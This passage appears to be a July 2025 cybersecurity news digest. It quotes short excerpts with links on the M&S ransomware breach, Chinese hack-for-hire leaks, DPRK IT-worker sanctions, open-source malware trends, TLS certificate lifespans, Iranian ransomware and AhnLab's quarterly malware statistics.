"M&S confirmed today that the retail outlet's network was initially breached in a "sophisticated impersonation attack" that ultimately led to a DragonForce ransomware attack. M&S chairman Archie Norman revealed this in a hearing with the UK Parliament's Business and Trade Sub-Committee on Economic Security regarding the recent attacks on the retail sector in the country. While Norman did not go into details, he stated that the threat actors impersonated one of the 50,000 people working with the company to trick a third-party entity into resetting an employee's password."
https://www.bleepingcomputer.com/news/security/mands-confirms-social-engineering-led-to-massive-ransomware-attack/
- State Secrets For Sale: More Leaks From The Chinese Hack-For-Hire Industry
"In late May, two particularly interesting Chinese datasets appeared for sale in posts on DarkForums, an English-language data breach and leak forum that has become popular since BreachForums went dark in mid-April. These two posts, which we’re calling the VenusTech Data Leak and the Salt Typhoon Data Leak, had some interesting similarities."
https://spycloud.com/blog/state-secrets-for-sale-chinese-hacking/
https://www.bankinfosecurity.com/chinese-data-leak-reveals-salt-typhoon-contractors-a-28919
General News
- Exposure Management Is The Answer To: “Am I Working On The Right Things?”
"In this Help Net Security interview, Dan DeCloss, Founder and CTO at PlexTrac, discusses the role of exposure management in cybersecurity and how it helps organizations gain visibility into their attack surface to improve risk assessment and prioritization. He also explains how PlexTrac’s platform streamlines the reporting process and enables teams to collaborate more effectively to speed up remediation. DeCloss looks forward to widespread adoption of Continuous Threat Exposure Management, believing it will help close the gap on unidentified vulnerabilities through continuous, contextual, and risk-informed security programs."
https://www.helpnetsecurity.com/2025/07/08/dan-decloss-plextrac-exposure-management-strategy/
- Cyberattacks Are Changing The Game For Major Sports Events
"Sports fans and cybercriminals both look forward to major sporting events, but for very different reasons. Fake ticket sites, stolen login details, and DDoS attacks are common ways criminals try to make money or disrupt an event. Events like the FIFA World Cup, the Olympics, and major sports leagues pull in millions of viewers. The 2026 FIFA World Cup is expected to draw over 5.5 million fans in person, with 6 billion more engaging worldwide with the newly expanded 48-team tournament, generating massive online traffic across platforms such as ticketing, betting, streaming, and merchandise sales."
https://www.helpnetsecurity.com/2025/07/08/sport-events-cybercrime/
- CISOs Urged To Fix API Risk Before Regulation Forces Their Hand
"Most organizations are exposing sensitive data through APIs without security controls in place, and they may not even realize it, according to Raidiam. Their report, API Security at a Turning Point, draws on a detailed assessment of 68 organizations across industries. It deliberately excludes regulated environments like UK Open Banking, where advanced security is mandated. The goal was to understand how typical businesses, those without regulatory pressure, are protecting their APIs. The results aren’t encouraging."
https://www.helpnetsecurity.com/2025/07/08/report-enterprise-api-security-risks/
- Combolists And ULP Files On The Dark Web: A Secondary And Unreliable Source Of Information About Compromises
"Combolists and URL-Login-Password (ULP) files have existed since the earliest user data leaks. These files offer a convenient format for storing and distributing compromised credentials — typically just a username (or email) and password — where all “unnecessary” information is removed. Its simplicity makes them ideal tools for cybercriminals launching attacks such as credential stuffing, phishing, and other forms of account-based exploitation. With the advent of modern infostealers, stealing login credentials has become easier and more automated than ever. At the same time, distributing stolen data has been simplified through platforms like dark web forums, file-sharing services, and Telegram channels."
https://www.group-ib.com/blog/combolists-ulp-darkweb/
- Sanctions Imposed On DPRK IT Workers Generating Revenue For The Kim Regime
"Today, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned Song Kum Hyok, (Song), a malicious cyber actor associated with the sanctioned Democratic People’s Republic of Korea (DPRK) Reconnaissance General Bureau (RGB) hacking group Andariel. Song facilitated an information technology (IT) worker scheme in which individuals, often DPRK nationals working from countries such as China and Russia, were recruited and provided with falsified identities and nationalities to obtain employment at unwitting companies to generate revenue for the DPRK regime. In some cases, these DPRK IT workers have been known to introduce malware into company networks for additional exploitation. OFAC is also sanctioning one individual and four entities involved in a Russia-based IT worker scheme that has generated revenue for the DPRK."
https://home.treasury.gov/news/press-releases/sb0190
https://therecord.media/north-korea-it-worker-scheme-us-sanctions-song-kum-hyok
https://cyberscoop.com/treasury-slaps-sanctions-on-people-companies-tied-to-north-korean-it-worker-schemes/
- Open Source Malware Index Q2 2025: Data Exfiltration Remains a Leading Threat
"In the second quarter of 2025, Sonatype uncovered 16,279 pieces of open source malware, bringing the total number of malicious packages identified by our automated detection systems to 845,204 and counting. Once again, data exfiltration emerged as the dominant tactic, reinforcing a persistent and growing trend in software supply chain attacks targeting developers and CI/CD environments."
https://www.sonatype.com/blog/open-source-malware-index-q2-2025
https://www.darkreading.com/application-security/malicious-open-source-packages-spike
https://www.infosecurity-magazine.com/news/malicious-open-source-surge-188/
- 4 Critical Steps In Advance Of 47-Day SSL/TLS Certificates
"The CA/Browser Forum's decision to reduce SSL/TLS certificate lifespans to just 47 days by 2029 is set to fundamentally change how organizations manage digital trust. While the full impact will unfold over several years, the transition begins much sooner, with certificate validity dropping to 200 days in less than a year (March 2026). This accelerated timeline means IT teams have a small window of time to prepare for these sweeping changes. To navigate this shift successfully and avoid operational disruptions, organizations must focus on a few key steps over the next 100 days."
https://www.darkreading.com/cyberattacks-data-breaches/critical-steps-advance-ssl-tls-certificates
- Iranian Ransomware Group Offers Bigger Payouts For Attacks On Israel, US
"An Iranian ransomware gang has ramped up operations amid heightened tensions in the Middle East, offering larger profit shares to affiliates who carry out cyberattacks against Israel and the U.S., researchers said. The group, known as Pay2Key.I2P, is believed to be a successor to the original Pay2Key operation, which has been linked to Iran’s state-backed Fox Kitten hacking group. Fox Kitten has previously carried out cyber-espionage campaigns targeting Israeli and U.S. organizations. According to a new report from cybersecurity firm Morphisec, Pay2Key.I2P has adopted a ransomware-as-a-service model and claims to have collected more than $4 million in payments over the past four months."
https://therecord.media/iran-ransomware-group-pay2keyi2p-israel-us-targets
https://engage.morphisec.com/hubfs/Pay2Key_Iranian_Cyber_Warfare_Targets_the_West_Whitepaper.pdf
- June 2025 Trends Report On Phishing Emails
"This report provides the distribution quantity, statistics, trends, and case information on phishing emails and email threats collected and analyzed for one month in June 2025. The following are some statistics and cases included in the original report."
https://asec.ahnlab.com/en/88919/
- Statistics Report On Malware Targeting Windows Database Servers In Q2 2025
"The AhnLab SEcurity intelligence Center (ASEC) analysis team is responding to and categorizing attacks targeting MS-SQL and MySQL servers installed on Windows operating systems using the AhnLab Smart Defense (ASD) infrastructure. This post covers the damage and statistics of attacks that occurred on MS-SQL and MySQL servers in the second quarter of 2025 based on the logs. It also classifies the malware used in each attack and provides detailed statistics."
https://asec.ahnlab.com/en/88920/
- Statistics Report On Malware Targeting Windows Web Servers In Q2 2025
"AhnLab SEcurity intelligence Center (ASEC) is responding to and categorizing attacks targeting poorly managed Windows web servers by utilizing their AhnLab Smart Defense (ASD) infrastructure. This post will cover the damage status of Windows web servers that have become attack targets and the statistics of attacks launched against these servers, based on the logs identified in the second quarter of 2025. It will also provide detailed statistics by categorizing the malware strains used in each attack."
https://asec.ahnlab.com/en/88925/
- Statistics Report On Malware Targeting Linux SSH Servers In Q2 2025
"AhnLab SEcurity intelligence Center (ASEC) is using a honeypot to respond to and categorize brute-force and dictionary attacks that target poorly managed Linux SSH servers. This post covers the status of the attack sources identified in logs from the second quarter of 2025 and the statistics of attacks performed by these sources. It also classifies the malware used in each attack and provides detailed statistics."
https://asec.ahnlab.com/en/88927/
Reference
Electronic Transactions Development Agency (ETDA) - Emerson ValveLink Products